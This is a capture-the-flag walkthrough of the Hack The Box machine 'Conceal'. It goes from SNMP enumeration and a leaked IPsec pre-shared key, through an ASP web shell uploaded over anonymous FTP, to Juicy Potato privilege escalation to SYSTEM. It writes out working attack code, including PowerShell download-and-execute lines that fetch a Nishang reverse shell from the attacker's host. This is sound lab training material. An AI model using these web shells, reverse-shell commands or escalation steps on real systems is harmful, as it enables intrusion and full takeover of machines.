Conceal

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.116

All 1000 scanned ports on 10.10.10.116 are in ignored states.


┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.116  

161/udp open  snmp
500/udp open  isakmp

OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device

We have one open port.

Port 500: running isakmp

A quick google search tells us that it is the Internet Security Association and Key Management Protocol( ISAKMP) which is commonly called Internet Key Exchange (IKE). A lot of the documentation references configuring IPsec and ISAKMP standards to build VPNs.

So there are probably other ports that are open, however, we won’t be able to see them before we establish that VPN connection. In order to do that, we need some kind of key for authentication and since this is an HTB box, we have to find this key somewhere. So what we’ll do is rerun all the nmap scans to see if we missed any ports the first time around.

Enumeration:

Port 161 is open. This usually runs the SNMP service. Let’s check that using nmap.

┌──(kali💀kali)-[~]
└─$ sudo nmap -p 161 -sU -sC -sV 10.10.10.116

-p: port
-sU: UDP scan
-sC: run default scripts
-sV: version detection

161/udp open  snmp    SNMPv1 server (public)
| snmp-win32-users: 
|   Administrator
|   DefaultAccount
|   Destitute
|_  Guest
| snmp-processes: 
|   1: 
|     Name: System Idle Process
|   4: 
|     Name: System
|   292: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceNoNetwork
|   304: 
|     Name: smss.exe
|   372: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalService
|   388: 
|     Name: csrss.exe
|   468: 
|     Name: wininit.exe
|   476: 
|     Name: csrss.exe
|   536: 
|     Name: winlogon.exe
|   612: 
|     Name: services.exe
|   620: 
|     Name: lsass.exe
|     Path: C:\Windows\system32\
|   708: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k DcomLaunch
|   728: 
|     Name: fontdrvhost.exe
|   732: 
|     Name: fontdrvhost.exe
|   816: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k RPCSS
|   908: 
|     Name: vmacthlp.exe
|     Path: C:\Program Files\VMware\VMware Tools\
|   916: 
|     Name: dwm.exe
|   956: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   976: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalSystemNetworkRestricted
|   1040: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k netsvcs
|   1068: 
|     Name: SearchIndexer.exe
|     Path: C:\Windows\system32\
|     Params: /Embedding
|   1076: 
|     Name: Memory Compression
|   1088: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k NetworkService
|   1216: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   1296: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceNetworkRestricted
|   1308: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   1480: 
|     Name: spoolsv.exe
|     Path: C:\Windows\System32\
|   1624: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k appmodel
|   1740: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k apphost
|   1756: 
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k utcsvc
|   1780: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k ftpsvc
|   1812: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalSystemNetworkRestricted
|   1820: 
|     Name: SecurityHealthService.exe
|   1844: 
|     Name: snmp.exe
|     Path: C:\Windows\System32\
|   1884: 
|     Name: VGAuthService.exe
|     Path: C:\Program Files\VMware\VMware Tools\VMware VGAuth\
|   1896: 
|     Name: vmtoolsd.exe
|     Path: C:\Program Files\VMware\VMware Tools\
|   1904: 
|     Name: ManagementAgentHost.exe
|     Path: C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\
|   1916: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k iissvcs
|   1992: 
|     Name: LogonUI.exe
|     Params:  /flags:0x0 /state0:0xa39c8855 /state1:0x41c64e6d
|   2004: 
|     Name: SearchProtocolHost.exe
|     Path: C:\Windows\system32\
|     Params:  Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozil
|   2032: 
|     Name: MsMpEng.exe
|   2480: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k NetworkServiceNetworkRestricted
|   2732: 
|     Name: msdtc.exe
|     Path: C:\Windows\System32\
|   2740: 
|     Name: WmiPrvSE.exe
|     Path: C:\Windows\system32\wbem\
|   2744: 
|     Name: WmiPrvSE.exe
|     Path: C:\Windows\system32\wbem\
|   2780: 
|     Name: svchost.exe
|   2916: 
|     Name: MpCmdRun.exe
|     Path: C:\Program Files\Windows Defender\
|     Params:  Scan -ScheduleJob -ScanTrigger 55
|   3016: 
|     Name: conhost.exe
|     Path: \??\C:\Windows\system32\
|     Params: 0x4
|   3044: 
|     Name: dllhost.exe
|     Path: C:\Windows\system32\
|     Params: /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
|   3424: 
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceAndNoImpersonation
|   3544: 
|     Name: NisSrv.exe
|   4760: 
|     Name: MpCmdRun.exe
|     Path: C:\Program Files\Windows Defender\
|     Params:  Scan -ScheduleJob -RestrictPrivileges -ScanType 1 -ScanTrigger 59 -Reinvoke
|   4772: 
|     Name: SearchFilterHost.exe
|     Path: C:\Windows\system32\
|_    Params:  0 700 704 712 8192 708 
| snmp-win32-software: 
|   Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161; 2021-03-17T15:16:36
|   Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161; 2021-03-17T15:16:36
|_  VMware Tools; 2021-03-17T15:16:36
| snmp-netstat: 
|   TCP  0.0.0.0:21           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:135          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   TCP  0.0.0.0:49664        0.0.0.0:0
|   TCP  0.0.0.0:49665        0.0.0.0:0
|   TCP  0.0.0.0:49666        0.0.0.0:0
|   TCP  0.0.0.0:49667        0.0.0.0:0
|   TCP  0.0.0.0:49668        0.0.0.0:0
|   TCP  0.0.0.0:49669        0.0.0.0:0
|   TCP  0.0.0.0:49670        0.0.0.0:0
|   TCP  10.10.10.116:139     0.0.0.0:0
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:500          *:*
|   UDP  0.0.0.0:4500         *:*
|   UDP  0.0.0.0:5050         *:*
|   UDP  0.0.0.0:5353         *:*
|   UDP  0.0.0.0:5355         *:*
|   UDP  10.10.10.116:137     *:*
|   UDP  10.10.10.116:138     *:*
|   UDP  10.10.10.116:1900    *:*
|   UDP  10.10.10.116:57172   *:*
|   UDP  127.0.0.1:1900       *:*
|_  UDP  127.0.0.1:57173      *:*
| snmp-win32-services: 
|   Application Host Helper Service
|   Background Intelligent Transfer Service
|   Background Tasks Infrastructure Service
|   Base Filtering Engine
|   CNG Key Isolation
|   COM+ Event System
|   COM+ System Application
|   Client License Service (ClipSVC)
|   Connected Devices Platform Service
|   Connected User Experiences and Telemetry
|   CoreMessaging
|   Cryptographic Services
|   DCOM Server Process Launcher
|   DHCP Client
|   DNS Client
|   Data Sharing Service
|   Data Usage
|   Device Setup Manager
|   Diagnostic Policy Service
|   Diagnostic Service Host
|   Diagnostic System Host
|   Distributed Link Tracking Client
|   Distributed Transaction Coordinator
|   Geolocation Service
|   Group Policy Client
|   IKE and AuthIP IPsec Keying Modules
|   IP Helper
|   IPsec Policy Agent
|   Local Session Manager
|   Microsoft FTP Service
|   Network Connection Broker
|   Network List Service
|   Network Location Awareness
|   Network Store Interface Service
|   Plug and Play
|   Power
|   Print Spooler
|   Program Compatibility Assistant Service
|   RPC Endpoint Mapper
|   Remote Procedure Call (RPC)
|   SNMP Service
|   SSDP Discovery
|   Security Accounts Manager
|   Security Center
|   Server
|   Shell Hardware Detection
|   State Repository Service
|   Storage Service
|   Superfetch
|   System Event Notification Service
|   System Events Broker
|   TCP/IP NetBIOS Helper
|   Task Scheduler
|   Themes
|   Tile Data model server
|   Time Broker
|   TokenBroker
|   User Manager
|   User Profile Service
|   VMware Alias Manager and Ticket Service
|   VMware CAF Management Agent Service
|   VMware Physical Disk Helper Service
|   VMware Tools
|   WinHTTP Web Proxy Auto-Discovery Service
|   Windows Audio
|   Windows Audio Endpoint Builder
|   Windows Connection Manager
|   Windows Defender Antivirus Network Inspection Service
|   Windows Defender Antivirus Service
|   Windows Defender Security Centre Service
|   Windows Driver Foundation - User-mode Driver Framework
|   Windows Event Log
|   Windows Firewall
|   Windows Font Cache Service
|   Windows Management Instrumentation
|   Windows Process Activation Service
|   Windows Push Notifications System Service
|   Windows Search
|   Windows Time
|   Windows Update
|   Workstation
|_  World Wide Web Publishing Service
| snmp-sysdescr: Hardware: Intel64 Family 6 Model 85 Stepping 7 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
|_  System uptime: 19m24.38s (116438 timeticks)
| snmp-interfaces: 
|   Software Loopback Interface 1\x00
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 1 Gbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   vmxnet3 Ethernet Adapter\x00
|     IP address: 10.10.10.116  Netmask: 255.255.255.0
|     MAC address: 00:50:56:b9:04:91 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Traffic stats: 105.59 Kb sent, 470.93 Kb received
|   vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000\x00
|     MAC address: 00:50:56:b9:04:91 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Traffic stats: 105.59 Kb sent, 470.93 Kb received
|   vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000\x00
|     MAC address: 00:50:56:b9:04:91 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Traffic stats: 105.59 Kb sent, 470.93 Kb received
|   vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-0000\x00
|     MAC address: 00:50:56:b9:04:91 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 105.59 Kb sent, 470.93 Kb received
Service Info: Host: Conceal

The port is running SNMP version 1 and was able to query the service using the default “public” community string. We see that there are a bunch of ports that are open including FTP, HTTP and SMB. We won’t get access to these ports until we establish a secure connection.

For now, we can only interact with the SNMP and ISAKMP ports. Let’s first query SNMP for any sensitive information.

SNMP - UDP 161

Knowing that snmp is open, I’ll use snmpwalk with the standard parameters:

┌──(kali💀kali)-[~]
└─$ snmpwalk -c public -v 1 10.10.10.116
-c: community string
-v: SNMP version

iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: Intel64 Family 6 Model 85 Stepping 7 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (163448) 0:27:14.48
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""

It leaks the IKE VPN password hash!

┌──(kali💀kali)-[~]
└─$ echo -n 9C8B1A372B1878851BE2C097031B6E43 | wc -c
32

This looks like an MD5 hash.

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.crackstation.net

Hash	Type	Result
9C8B1A372B1878851BE2C097031B6E43	NTLM	Dudecake1!

IKE - UDP 500

Now that we have a plaintext password, let’s try and establish a connection to the VPN. First run ike-scan to determine the IKE implementation and configuration that the host is using. UDP 500 is used for Internet Key Exchange (IKE), which is used to establish an IPSEC VPN. There is some recon I can do on the IKE using ike-scan:

┌──(kali💀kali)-[~]
└─$ ike-scan -M 10.10.10.116
-M: multiline

Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116    Main Mode Handshake returned
        HDR=(CKY-R=4d449538a79aa636)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
        VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
        VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
        VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
        VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
        VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
        VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Things I take from that:

The Internet Key Exchange (IKE) is encrypted with triple DES, using SHA1 hash, and modp1024.
Auth is Preshared Key (PSK)
The IKE is v1, not v2.

Connecting to IPSEC VPN

Install strongswan Next, we’ll use strongswan to establish the IPsec connection. This does not come preinstalled on Kali. To install it, run the following command.

┌──(kali💀kali)-[~]
└─$ sudo apt-get install strongswan

Build Config Files We have to make changes to two files:

ipsec.secrets
ipsec.conf

In the /etc/ipsec.secrets, add the following entry.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/ipsec.secrets

# This file holds shared secrets or RSA private keys for authentication.

10.10.14.3 10.10.10.116 : PSK "Dudecake1!"

In the /etc/ipsec.conf, add the following entry.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/ipsec.conf

# ipsec.conf - strongSwan IPsec configuration file

config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no

conn conceal
    authby=secret
    auto=add
    ike=3des-sha1-modp1024!
    esp=3des-sha1!
    type=transport
    keyexchange=ikev1
    left=10.10.14.3
    right=10.10.10.116
    rightsubnet=10.10.10.116[tcp]



conn conceal
        authby=secret
        auto=route
        keyexchange=ikev1
        ike=3des-sha1-modp1024
        left=10.10.14.3
        right=10.10.10.116
        type=transport
        esp=3des-sha1
        rightprotoport=tcp

charondebug="all" - be more verbose to help me troubleshoot the connection.
authby="secret" - use PSK auth.
ike, esp, and keyexchange are set based on information from ike-scan.
left and right represent my computer and the target computer.
type=transport - use ipsec transport mode to connect host to host.

Then run the following command to establish the connection.

┌──(kali💀kali)-[~]
└─$ sudo ipsec restart   

┌──(kali💀kali)-[~]
└─$ sudo ipsec up conceal

connection 'conceal' established successfully

With the VPN connected, I can start recon over again and see a lot more.

NMAP: This time, nmap shows more ports, clearly a Windows host, matching what I saw in SNMP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sT 10.10.10.116 

21/tcp  open  ftp
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -sT 10.10.10.116

21/tcp  open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -4s
| smb2-time: 
|   date: 2023-12-20T02:07:12
|_  start_date: 2023-12-20T00:07:14

Enumeration:

Port 80 HTTP

I always start off with enumerating HTTP. Visit the application in the browser.

http://10.10.10.116/

We get the default Windows Microsoft IIS welcome page. The page source doesn’t contain any sensitive information. Next, run gobuster to enumerate directories/files.

┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.116 

gobuster -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,aspx,asp,html

/upload               (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]

Directory listing is on, but no files:

http://10.10.10.116/upload/

Port 21 FTP

The nmap scan showed anonymous login is allowed.

┌──(kali💀kali)-[~]
└─$ ftp 10.10.10.116

Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.

Let’s test if we’re allowed to upload files. Create a test.txt file on the attack machine.

┌──(kali💀kali)-[~/Desktop]
└─$ echo "hello" > test.txt

Upload the test.txt file on the FTP server.

ftp> put test.txt

ftp> ls
12-20-23  02:23AM                    7 test.txt

ftp> del test.txt
250 DELE command successful.

But after few minutes the file was deleted, so if we want to use this, we might need to do it quickly.

Perfect! According to the nmap scan, this is a Microsoft IIS server version 10, so it should be able to execute ASP and ASPX code. Let’s test this out on the web server.

Create a test.aspx file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.

┌──(kali💀kali)-[~/Desktop]
└─$ nano test.aspx 

ftp> put test.aspx

HTTP Error 404.3 - Not Found

We get an HTTP error saying that the file can’t be served because of the extension configuration. So we can’t upload ASPX files. Next, let’s try an ASP file.

Create a test.asp file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.

Perfect, it does execute ASP code! We’ll use this to gain an initial foothold on the system.

Foothold:

Create a cmd.asp file on the attack machine that contains the following simple web shell.

┌──(kali💀kali)-[~/Desktop]
└─$ nano cmd.asp 

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

The above code executes the whoami command and outputs it on the screen. Upload the cmd.asp file on the FTP server and view it on the browser.

ftp> put cmd.asp

http://10.10.10.116/upload/cmd.asp

conceal\destitute

We have code execution!

Nishang Shell

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 1234

ftp> put PowerShellTcp.ps1

When called, this sends a reverse shell back to our attack machine on port 1234. Setup a listener to receive the reverse shell.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234

Next, change the cmd.asp file to download the PowerShell script and execute it.

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.3:5555/PowerShellTcp.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Start up a python server in the directory that the shell script resides in.

┌──(kali💀kali)-[~]
└─$ python -m SimpleHTTPServer 5555

Upload the cmd.asp file on the FTP server and view it on the browser. We get a shell! Grab the user.txt flag.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.116] 49691
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute

PS C:\Users\Destitute\Desktop> type user.txt
6462ff-----------------------------

Privilege Escalation:

Run the systeminfo command.

PS C:\Users\Administrator> systeminfo

Host Name:                 CONCEAL
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.15063 N/A Build 15063
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00329-00000-00003-AA343
Original Install Date:     12/10/2018, 20:04:27
System Boot Time:          20/12/2023, 00:07:00
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,179 MB
Virtual Memory: Max Size:  3,199 MB
Virtual Memory: Available: 2,268 MB
Virtual Memory: In Use:    931 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.116
                                 [02]: fe80::89cd:a60b:b146:f16a
                                 [03]: dead:beef::ad98:3e35:719b:6661
                                 [04]: dead:beef::89cd:a60b:b146:f16a
                                 [05]: dead:beef::24b
Hyper-V Requirements:      A hypervisor has been detected.

We’re on a Microsoft Windows 10 Enterprise 64-bit OS. Let’s first check the system privileges that are enabled for this user.

PS C:\Users\Administrator> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

SetImpersonatePrivilege is enabled so we’re very likely to get SYSTEM using juicy-potato Users running the SQL server service or the IIS service usually have these privileges enabled by design. This privilege is designed to allow a service to impersonate other users on the system. Juicy Potato exploits the way Microsoft handles tokens in order to escalate local privileges to SYSTEM.

GitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub

Let’s test it out. Grab the Juicy Potato executable and transfer it to the target machine using the following command.

Releases · ohpe/juicy-potatoGitHub

PS C:\Users\Destitute\Desktop> (new-object net.webclient).downloadfile('http://10.10.14.3:5555/JuicyPotato.exe', 'C:\Users\Destitute\Desktop\jp.exe')

Run the executable file to view the arguments it takes.

PS C:\Users\Destitute\Desktop> ./jp.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port

Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

It requires 3 mandatory arguments. -t: Create process call. For this option we’ll use * to test both options. -p: The program to run. We’ll need to create a file that sends a reverse shell back to our attack machine. -l: COM server listen port. This can be anything. We’ll use 6666.

First copy the Invoke-PowerShellTcp.ps1 script once again into your current directory. Add the following line to the end of the script with the attack configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 6666

When called, this sends a reverse shell back to our attack machine on port 6666. Next, create a shell.bat file that downloads the above shell-2.ps1 PowerShell script and runs it.

┌──(kali💀kali)-[~/Desktop]
└─$ nano shell.bat 

powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.3:5555/pstcp.ps1')

Then download the shell.bat file on the target machine.

PS C:\Users\Destitute\Desktop> (new-object net.webclient).downloadfile('http://10.10.14.3:5555/shell.bat', 'C:\Users\Destitute\Desktop\shell.bat')

Setup a listener on the attack machine to receive the reverse shell.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 6666

PS C:\Users\Destitute\Desktop> ./jp.exe -t * -p shell.bat -l 6666
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 6666
COM -> recv failed with error: 10038

It fails to escalate privileges with the default CLSID. We can get the list of CLSIDs on our system using this script

juicy-potato/CLSID/GetCLSID.ps1 at master · ohpe/juicy-potatoGitHub

However, let’s first manually try one of the Windows 10 Enterprise CLSIDs available on the Juicy Potato

juicy-potato/CLSID/Windows_10_Enterprise at master · ohpe/juicy-potatoGitHub

Rerun the Juicy Potato executable with the above specific CLSID.

PS C:\Users\Destitute\Desktop> ./jp.exe -p shell.bat -l 6666 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

┌──(kali💀kali)-[~]
└─$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.116] 49702
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system

PS C:\Users\Administrator\Desktop> type root.txt
0e5eca-----------------------------

PreviousJerry NextChatterbox

Last updated 1 year ago